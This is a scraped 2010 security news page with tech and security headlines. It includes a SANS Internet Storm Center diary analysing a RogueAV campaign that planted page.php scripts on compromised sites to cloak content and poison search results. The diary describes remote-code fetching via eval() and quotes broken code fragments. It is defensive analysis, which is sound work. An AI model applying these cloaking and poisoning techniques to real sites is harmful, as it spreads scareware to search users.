InfoSec News

Adobe is planning to release critical updates on August 19, 2010 for Adobe Reader 9.3.3 for Windows, Macintosh and Unix as well as the Adobe Acrobat 9.3.3 for Windows and Macintosh and an update for Adobe Reader 8.2.3 and Acrobat 8.2.3 for Windows and Macintosh covered in security bulletin APSB10-17. An update for Adobe Flash Player published in security bulletin APSB10-16 will be released as well.
Affected Software
Adobe Reader 9.3.3 and earlier versions for Windows, Macintosh, and UNIX

Adobe Acrobat 9.3.3 and earlier versions for Windows and Macintosh

Adobe Flash Player 10.1.53.64 and earlier versions for Windows, Macintosh, Linux, and Solaris




-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Adobe said today that it would patch a critical Reader vulnerability on Thursday.
 
The word "BlackBerry" used to bring to mind mostly images of bulky, brick-like handhelds and busy executives in tailored suits. Today, BlackBerry smartphones are all over the place, in the hands of teenagers, parents, businessmen and everyone in between. And they come in all shapes and sizes.
 
Symantec and F-Secure issued separate warnings this week that the Android-based Tap Snake game can secretly be used to track a the location and movements of users.
 
As it starts transitioning to Microsoft's Bing search engine this week, Yahoo has decided to drop Search Monkey, a developer platform designed to let external coders create applications that enhance Yahoo search results.
 
Researchers at the University of Washington are building the first mobile devices to effectively transmit American Sign Language via compressed video over a 3G cellular network.
 
The Web's standards body gets fonts in order with new standard
 
RIM said that reports that Amazon.com has cut the price of the new Blackberry Torch 9800 are 'inaccurate and misleading.'
 
Intel and Micron announced the delivery of 3-bit-per-cell NAND flash memory on 25-nanometer lithography technology, producing what they called the industry's highest-capacity and smallest NAND device.
 
Oracle appears set to deliver more information than ever before about its long-awaited Fusion Applications at the OpenWorld conference in September, with more than 30 sessions listed as of Tuesday.
 
These pragmatic practices, from Forrester Research, won't break the bank, cause a revolt among application development team members or slow down development processes.
 
The U.S. Department of Justice won't file criminal charges against a Pennsylvania school district accused of spying on students via webcams in their computers.
 
Analysts split today over reports that Apple may be readying a smaller iPad for launch later this year.
 
An antenna expert predicts that a move to add Verizon as an iPhone carrier won't prompt a change in antenna design.
 
With its expected acquisition of 3Par, Dell is positioning itself to compete against top data center storage providers, including IBM, HP, Hitachi and even Dell partner EMC.
 
Several analysts said Amazon.com's decision to price the new BlackBerry Torch 9800 smartphone at $100, have that listed by carrier AT&T, doesn't necessarily indicate that the device is on a path to failure.
 
When it comes to cloud-based e-mail, there are four major vendors vying for your IT dollars: Microsoft, Google, IBM and Cisco. Each has its pros and cons, but no matter which vendor you choose the price of e-mail will be roughly the same: $5 per user per month.
 
Barnes & Noble today released free Nook e-reader software for the iPhone and the iPod Touch, along with updates to Nook for the iPad.
 
The U.S. is reviewing whether a law that increases some visa fees is compliant with World Trade Organization (WTO) rules, the U.S. Department of State said on Monday. The move follows strong criticism of the law from outsourcers and the Indian government.
 
Source code analysis vendor Fortify Software will eventually be integrated into HP's Business Technology Optimization application portfolio. Analysts say acquisition was expected.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

Fortify - Business Technology Optimization - Software development - Hewlett-Packard - Application security
 
Steve Jobs called Adobe lazy but why hasn't Apple fixed iTunes
 
Source code analysis vendor Fortify Software will eventually be integrated into HP's Business Technology Optimization application portfolio. Analysts say acquisition was expected.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

Fortify - Business Technology Optimization - Software development - Hewlett-Packard - Application security
 
Amazon Web Services has introduced Reserved Database Instances, a new way to pay for its cloud-based Relational Database Service (RDS), the company said on Monday.
 
Hewlett-Packard said on Tuesday it will buy Fortify Software, which makes tools to find software vulnerabilities and compliance software, for an undisclosed amount.
 
Sometimes you just need a basic laptop that won't hurt your wallet or your back. Toshiba's Satellite L645D-S4036 ($550 as of August 16, 2010) strives to fulfill that role. But while all low-cost laptops make some compromises, the L645D sacrifices some usability to achieve its target price.
 
Like a new car that plummets in value once you drive it off the dealer's lot, electronics are worth less the moment you slip them out of the box. The bad news is, there's nothing you can do about tech depreciation.
 
We all know perimeter firewalls are necessary but not sufficient. But what's the right strategy for building additional layers of security? Greg Machler dives in.
 
A majority of security software suites still fail to detect attacks on PCs even after the style of attack has been known for some time, underscoring how cybercriminals still have the upper hand.
 
In some cases, you can get rid of your laptop -- but only after figuring out app, data-access, keyboard, display, and power issues
 
Court papers filed by the federal government and Apple against a former manager detail a scheme that allegedly saw confidential Apple data supplied to Asian electronics companies over more than three years in return for kickbacks of more than $1 million.
 
Some industry watchers have speculated that HTML 5 could strike down Adobe's Flash as the Web media delivery format of choice. But Flash will likely stick around. Here's why.
 
After a long, difficult job search, it can be tempting to jump at the first opportunity you're offered. But before you accept, you'd better have the answers to these questions -- or you could find yourself back on the hunt before you know it.
 
Research In Motion (RIM) has offered India some access to BlackBerry instant messages, according to media reports citing government officials.
 
InfoSec News: TOORCON 12 CALL FOR PAPERS: http://sandiego.toorcon.org/
TOORCON 12 CALL FOR PAPERS
It's that time of year again! ToorCon 12 is coming so get your code finished and submit a talk this time around. We're letting you decide if you want to be a part of our 50-minute talks on Saturday, 20-minute [...]
 
InfoSec News: Hackers steal customer data by accessing supermarket database: http://www.japantoday.com/category/crime/view/hackers-steal-customer-data-by-accessing-supermarket-database
Kyodo News August 15, 2010
OSAKA -- Hackers stole customer data from eight online supermarkets in Japan, including Uny Co. and Neo Beat Co, in July using a hacking [...]
 
InfoSec News: Inside Verizon's Insider Threat Data: http://www.darkreading.com/insiderthreat/security/attacks/showArticle.jhtml?articleID=226700346
By Robert Lemos Contributing Writer DarkReading Aug 16, 2010
For security firms that argue malicious insiders are a greater threat than outside attackers, the latest Verizon Data Breach Investigations Report seems like vindication: The proportion of incidents with an insider agent doubled to 48 percent, while attacks with an external hacker dropped to 70 percent. Incidents involving data theft from the outside still account for the majority of attacks -- with insiders catching up.
The driving factor behind the increase in insider attacks was not the economic downturn -- an oft-argued opinion -- but rather the inclusion of a new data set in Verizon's database, says Alex Hutton, principal of research and intelligence for Verizon Business. The U.S. Secret Service joined much of its caseload data to Verizon's database, adding a large number of incidents where the victim had a better idea of the identity of the attacker and believed the person could be prosecuted. Both factors tend to favor incidents with an insider component. "With the Secret Service [cases], we got exposed to a whole new set of data," Hutton says of the report.
Overall, Verizon still sees external attackers as the major threat, however. When an outsider steals data, he absconds with a massive number of records. In 2009, breaches caused by outside criminals accounted for about 139 million stolen records, while insiders accounted for only 2.6 million records. "A record that has been exposed is 70 times more likely to have been exposed by an external source than in internal source," Hutton says.
Verizon doesn't refute the threat of insiders -- just the assertion that insiders pose the greatest risk. Companies should have defenses that work against insiders, outsiders, and partners, Hutton says. Identity and access management are essential controls that companies need to block -- or at least, slow down -- attackers.
[...]
 
InfoSec News: Passwords Quickly Hacked With PC Graphics Cards: http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=226700303
By Mathew J. Schwartz InformationWeek August 16, 2010
Passwords with fewer than 12 characters can be quickly brute-force decoded using a PC graphics processing unit (GPU) that costs just a few [...]
 
InfoSec News: Hackers: 'ColdFusion bug more serious than Adobe says': http://www.theregister.co.uk/2010/08/16/adobe_coldfusion_vuln/
By Dan Goodin in San Francisco The Register 16th August 2010
A recently patched vulnerability in Adobe's ColdFusion application server may be more serious than previously thought following the public [...]
 
Court papers filed by the U.S. Government and Apple against a former manager detail a scheme that allegedly saw confidential Apple data supplied to Asian electronics companies over more than three years in return for kickbacks of more than US$1 million.
 
In June and July I posted two diaries (http://isc.sans.edu/diary.html?storyid=9085 and http://isc.sans.edu/diary.html?storyid=9103) in which I analyzed one campaign used by the RogueAV guys and various scripts they utilize. Last week Dancho Danchev posted a blog about mass compromises of .NL and .CH sites that are utilized in yet another RogueAV campaign (http://ddanchev.blogspot.com/2010/08/dissecting-scareware-serving-black-hat.html).
This campaign is different from the one I described in two diaries above, judging by the code it is probably a totally different group, although some of the functionality is the same. In the previous campaign attackers infected all PHP files on compromised sites while here they only used one PHP script. So lets dig into it and see what and how they do it.
The first step in this campaign was to compromised as many web sites as possible in many cases we were looking at mass compromises where a server hosting hundreds of web sites was compromised. The attackers planted one file (usually called page.php or wp-page.php) on every web site they didnt change anything else.
The page.php script does the majority of work. Similarly to the one I described in June, this script actually just asks the main controller what to do when it receives a request. The request sent to the controlled is interesting it downloads another PHP script from the controller and executes it via an eval() call. This allows the attackers to be able to constantly change how any script behaves.
This master script, in a nutshell, does this:
First it checks if the request to the page.php script contains the r= parameter. If it doesnt (meaning, you accessed the script directly) it displays a 404 error. Clever, so they hide it if you try to access it directly.
Now, if the User Agent shows that the request is coming from a Google, Yahoo or Bing bot, special content is returned (more about this below). If you visit the script directly (no referrer) it again displays a 404 error. Finally, if the referrer is set to Google, Yahoo or Bing (meaning, the user clicked on a search result), the browser is redirected to a third site (and possible fourth) that displays the infamous RogueAV warnings.
Above is the standard modus operandi of the RogueAV guys you can notice that this is almost exactly the same as the campaign I analyzed back in June, although the scripts are completely different.
The most interesting part happens when a Google, Yahoo or Bing bot visits the web page. Since this visit is actually the bot crawling the content, the script has to return the correct content to poison the search engine (otherwise it would not be related to the search terms the attackers use).
So, in order to return relevant content, the master script does the following:
First it queries Bing by using the same keyword that was used by the crawler. You can see that part of the script below:

You can see above how they nicely create the query and ask for 50 results. These results are parsed by the script and saved.
Now comes the interesting part: they get the main (index.html) page on the compromised web site with the following code line:

$index_html = file_get_contents(http://
The retrieved index.html file will be used to serve back to the bot. First the attackers remove any JavaScript from the file. After this, they change the title of the web page:

$index_html = preg_replace(~title[^]*(.*?)/title~is, title.htmlspecialchars(ucwords($keyword)). - $1/title
This will expand the old title with the keywords that they used to poison the search engine. The following pictures show the original HTML document (the real index.html) and the modified one (blacked out the title to protect the compromised web page). Notice how they added the keywords at the beginning of the title tag (and one extra blank line):
Original index.html:

Modified index.html:

Now they retrieve 100 links to other compromised web sites from the controller and insert these links, as well as results retrieved from Bing into the final index.html page. This page is then returned to the bot.
Such content clearly works much better when poisoning search engines than the one I described back in June yesterday I checked Google and I was able to find thousands of poisoned results pointing to such compromised web sites. While the search engine operators do a lot of work to prevent poisoning like this, it is clear that the bad guys are not resting either and that they are developing new poisoning techniques constantly.
--

Bojan

INFIGO IS (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Apple is readying another tablet similar to the iPad but with a 7-inch touchscreen for launch as early as the end of this year, according to a major Taiwanese newspaper.
 
IBM has strengthened its hand in the Unix business with new systems based on its Power7 processors, including a server for large enterprises that scales to 256 cores.
 

Posted by InfoSec News on Aug 17

http://sandiego.toorcon.org/

TOORCON 12 CALL FOR PAPERS

It's that time of year again! ToorCon 12 is coming so get your code
finished and submit a talk this time around. We're letting you decide if
you want to be a part of our 50-minute talks on Saturday, 20-minute
talks on Sunday, and 75-minute talks for our Deep Knowledge Seminars on
Friday depending on how much time you need to present your new ideas and
techniques. We evaluate our...
 

Posted by InfoSec News on Aug 17

http://www.japantoday.com/category/crime/view/hackers-steal-customer-data-by-accessing-supermarket-database

Kyodo News
August 15, 2010

OSAKA -- Hackers stole customer data from eight online supermarkets in
Japan, including Uny Co. and Neo Beat Co, in July using a hacking
technique called SQL injection to access their databases, sources
familiar with the matter said Saturday.

A source close to Neo Beat, which also operates the websites of...
 

Posted by InfoSec News on Aug 17

http://www.darkreading.com/insiderthreat/security/attacks/showArticle.jhtml?articleID=226700346

By Robert Lemos
Contributing Writer
DarkReading
Aug 16, 2010

For security firms that argue malicious insiders are a greater threat
than outside attackers, the latest Verizon Data Breach Investigations
Report seems like vindication: The proportion of incidents with an
insider agent doubled to 48 percent, while attacks with an external
hacker...
 

Posted by InfoSec News on Aug 17

http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=226700303

By Mathew J. Schwartz
InformationWeek
August 16, 2010

Passwords with fewer than 12 characters can be quickly brute-force
decoded using a PC graphics processing unit (GPU) that costs just a few
hundred dollars, according to researchers at the Georgia Institute of
Technology.

"We've been using a commonly available graphics processor to test...
 

Posted by InfoSec News on Aug 17

http://www.theregister.co.uk/2010/08/16/adobe_coldfusion_vuln/

By Dan Goodin in San Francisco
The Register
16th August 2010

A recently patched vulnerability in Adobe's ColdFusion application
server may be more serious than previously thought following the public
release of exploit code and blog posts claiming it can be used to take
full control of systems running the software.

In a bulletin published last week, Adobe rated the directory...
 

Internet Storm Center Infocon Status